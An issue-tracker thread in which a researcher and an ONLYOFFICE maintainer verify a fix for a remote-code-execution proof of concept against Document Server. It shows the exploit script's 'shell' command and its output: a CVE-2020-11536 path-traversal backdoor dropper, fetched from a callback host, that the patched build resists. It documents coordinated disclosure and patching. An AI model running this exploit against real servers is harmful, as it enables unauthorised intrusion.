RCE PoC now working

[strawp]

RCE is now demonstrable using the "shell" command, e.g. ./pwnlyoffice.py -u https://localhost shell

Currently this requires a callback URL to download a weaponised Word doc, the URL of which is hard coded to http://172.17.0.1:8000/backdoor.docx. You can edit this if you're not testing in Docker. This also allows SQL commands to be run.

[ShockwaveNN]

I can confirm that I was able to get SHELL access and created issue 54819 in our private issue tracker to discuss this problem

[ShockwaveNN]

@strawp Hi, we think we fixed shell access by

ONLYOFFICE/document-server-package@5e2802d
ONLYOFFICE/core@6561216

Those fixed are available in docker image onlyoffice/4testing-documentserver-ee:7.0.1.7

On this version I got this output and no access to shell

./pwnlyoffice.py -u http://1.2.3.4 shell
NO DOCID SPECIFIED - using "WvYE6Dk_Wm7ivyR8sCnJzA"
test_is_backdoored
Wait
{'type': 'documentOpen', 'data': {'type': 'open', 'status': 'ok', 'data': {'Editor.bin': 'http://1.2.3.4/ds-vpath/cache/files/5CnMC7QjI4xNDagTwMpb6A/Editor.bin/Editor.bin?md5=QqCuALyd4CztBTf5WXtDNA&expires=1645697601&filename=Editor.bin'}}}
Downloading Editor.bin
Writing to /tmp/tmpwo18t8et/Editor.bin........................................................ done
finished downloads
Generating malicious docx
NO DOCID SPECIFIED - using "Lvi3HsWPYSuz2fsVv-WFRA"
Building CVE-2020-11536 payload for:
 - Server root: /var/www/onlyoffice/documentserver/server
 - Password: BcogExx7Hsmrti
 - Version: 7.0.1.7
 - Traverse depth: 10
Done, backdoor dropper written to /home/lobashov/sources/pwnlyoffice/docs/backdoor.docx
serving at port 8000
Going to request doc from https://rkt-temp-bucket.s3.us-east-1.amazonaws.com/backdoor-7.0.1.7.docx?secret-hash. You can edit this manually in the source or run with the real URL using the "dl" command.
test_is_backdoored
{'type': 'documentOpen', 'data': {'type': 'open', 'status': 'ok', 'data': {'Editor.bin': 'http://1.2.3.4/ds-vpath/cache/files/1xnR_FZmslA2VdUUThsA0A/Editor.bin/Editor.bin?md5=lpR1MvIZYMGn9ySTgM3Biw&expires=1645697605&filename=Editor.bin'}}}
Downloading Editor.bin
Wait
{'type': 'documentOpen', 'data': {'type': 'open', 'status': 'ok', 'data': {'Editor.bin': 'http://1.2.3.4/ds-vpath/cache/files/caJZ-IvFJTXcbywKgK9JPg/Editor.bin/Editor.bin?md5=9SNSA7gdl_NP61G-slUmYw&expires=1645697605&filename=Editor.bin'}}}
Downloading Editor.bin
Writing to /tmp/tmp6dlg50wf/Editor.bin........................................................ done
finished downloads
Writing to /tmp/tmp97rjihg2/Editor.bin........................................................ done
finished downloads

[strawp]

Sorry, I missed this post entirely!

Yes, if normalize_path() does what it appears to then that is a good fix. I couldn't exactly follow the code as I'm not a C native. Removing write ability to most of the document server file system is also a good fix

[ShockwaveNN]

Thanks for confirming that